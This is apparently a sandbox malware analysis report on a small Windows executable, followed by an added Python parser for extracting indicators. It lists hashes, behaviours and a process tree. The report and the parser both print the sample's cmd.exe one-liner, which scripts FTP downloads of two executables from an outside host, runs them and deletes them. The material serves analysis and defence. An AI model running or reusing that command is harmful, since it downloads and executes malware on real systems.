Analysis

max time kernel:   119s
max time network:  119s
platform:          windows7_x64
resource:          win7-20240903-en
resource tags:     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted:         06/09/2024, 18:27
Static task: static1

Behavioral task: behavioral1
  Sample:   d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample:   d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General

Target:  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Size:    44KB
MD5:     d0310b6b7e678c1100131d32fdffdf3b
SHA1:    901eabee57673826bdd5aa7f33973ab75831f33b
SHA256:  e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
SHA512:  5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
SSDEEP:  768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace
Malware Config
Signatures

Deletes itself (1 IoC)
  PID 1768  cmd.exe

System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Cmd.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ftp.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe

Modifies Internet Explorer settings (1 IoC)
  Key created  \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
  PID 2160  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe  (reported three times)

Suspicious use of WriteProcessMemory (12 IoCs; each event below is reported four times)
  PID 2160  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe  wrote to memory of PID 2712  (procid_target 30)
  PID 2712  Cmd.exe                                              wrote to memory of PID 2012  (procid_target 32)
  PID 2160  d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe  wrote to memory of PID 1768  (procid_target 34)
Processes

1. C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
   PID: 2160
   - System Location Discovery: System Language Discovery
   - Modifies Internet Explorer settings
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\Cmd.exe
      Command line: Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
      PID: 2712
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\ftp.exe
         Command line: ftp -s:ftpdate.sys
         PID: 2012
         - System Location Discovery: System Language Discovery

   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""
      PID: 1768
      - Deletes itself
      - System Location Discovery: System Language Discovery
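The Cmd.exe line above is a classic pattern: build an FTP script one `echo ...>>file` at a time, hand it to the interactive client with `ftp -s:`, run the downloads, then delete the script and the payloads. The parser below reconstructs that script from a process-creation command line and pulls out the FTP host, the user/password answers, the dropped paths, what gets executed and what gets deleted. It is an added example written for this report, not tria.ge's code; the sample input is the Cmd.exe command line from the process tree, and the expansion of %windir% to C:\Windows is an assumption.

```python
"""Reconstruct the `ftp -s:` script built by a cmd.exe one-liner and extract IoCs.

Added example for this report, not tria.ge's own detection code. SAMPLE_CMDLINE
is the Cmd.exe line from the process tree; %windir% = C:\\Windows is assumed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SAMPLE_CMDLINE = (
    "Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys"
    "&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys"
    "&echo get 360.exe %windir%\\system32\\Microsoft\\360.exe>>ftpdate.sys"
    "&echo get XiaoMing.exe %windir%\\system32\\Microsoft\\XiaoMing.exe>>ftpdate.sys"
    "&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys"
    "&%windir%\\system32\\Microsoft\\360.exe&%windir%\\system32\\Microsoft\\XiaoMing.exe"
    "&Del %windir%\\system32\\Microsoft\\360.exe&Del %windir%\\system32\\Microsoft\\XiaoMing.exe"
)

CMD_PREFIX = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
ECHO_APPEND = re.compile(r"^echo\s+(.*?)(\s*)>>\s*(\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)
DEL_CMD = re.compile(r"^del\s+(.+)$", re.I)


@dataclass
class FtpDropper:
    script_file: Optional[str] = None
    script_lines: List[str] = field(default_factory=list)
    host: Optional[str] = None
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: List[Tuple[str, str]] = field(default_factory=list)  # (remote, local)
    executed: List[str] = field(default_factory=list)
    deleted: List[str] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)


def split_cmd(cmdline: str) -> List[str]:
    """Split on '&' command separators, ignoring '&' inside double quotes."""
    parts, buf, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]  # drops the empty piece left by '&&'


def expand_env(text: str, env: Dict[str, str]) -> str:
    """Expand %VAR% the way cmd.exe does before it parses the line."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def analyze(cmdline: str, env: Optional[Dict[str, str]] = None) -> FtpDropper:
    env = env or {"windir": "C:\\Windows"}  # assumed sandbox value
    r = FtpDropper()
    scripts: Dict[str, List[str]] = {}  # target file -> lines appended to it
    m = CMD_PREFIX.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    for cmd in split_cmd(body):
        cmd = expand_env(cmd, env)
        if m := ECHO_APPEND.match(cmd):
            text, gap, target = m.groups()
            # cmd.exe quirk: a digit immediately before '>>' is parsed as a file
            # handle, so `echo 123>>f` redirects handle 3 and appends nothing.
            # Keep the author's intended line, but flag it.
            if not gap and text[-1:].isdigit():
                r.warnings.append(f"{cmd!r}: trailing digit parsed as a handle, line not written")
            scripts.setdefault(target.lower(), []).append(text)
        elif m := FTP_SCRIPT.match(cmd):
            r.script_file = m.group(1)
            r.script_lines = scripts.get(m.group(1).lower(), [])
        elif m := DEL_CMD.match(cmd):
            r.deleted.append(m.group(1))
        else:
            r.executed.append(cmd)
    # `ftp -s:` feeds the script to the interactive client: after `open host`
    # the next two lines answer the user and password prompts.
    lines = iter(r.script_lines)
    for line in lines:
        words = line.split()
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) > 1:
            r.host = words[1]
            r.user = next(lines, None)
            r.password = next(lines, None)
        elif verb == "get" and len(words) > 1:
            r.downloads.append((words[1], words[2] if len(words) > 2 else words[1]))
    return r


if __name__ == "__main__":
    res = analyze(SAMPLE_CMDLINE)
    print(f"ftp {res.host} as {res.user}/{res.password}; script {res.script_file}")
    for remote, local in res.downloads:
        print(f"  get {remote} -> {local}")
    print("executed:", res.executed)
    print("deleted:", res.deleted)
    print("warnings:", res.warnings)
```

Two caveats worth keeping in mind when reading the output against the report: the `echo 123>>ftpdate.sys` step trips the handle-number quirk the parser flags, so the password line is not actually appended and the client's prompts are answered by whatever comes next; and because Cmd.exe here runs from SysWOW64, WOW64 file system redirection maps the `C:\Windows\system32\Microsoft\` paths to `C:\Windows\SysWOW64\Microsoft\` on disk, which is where a responder should look for the dropped files.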
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize:  210B
MD5:       163f3ae3f34cca06baa478340b49025c
SHA1:      7f8f173ed106a95b660969dd5c58ec2beb6ee67e
SHA256:    fc7dfbf59f55d47bd388dbafe8e9014ef81401d9e03f7a6f442490a84cc1658d
SHA512:    9eaa09842f86e49ee69a2b8e2861c5d373b83b90ecc2468922097db2520568f74e9b657c600c47e28d8c82fa192932f7acaf59979d73fb55cf67ac757c08a5e7

Filesize:  152B
MD5:       0fb17816f7c290e13419d68fa258edfa
SHA1:      59b9dd4af7fa17ce896b878b55b07ddc4a7936f9
SHA256:    bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c
SHA512:    5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99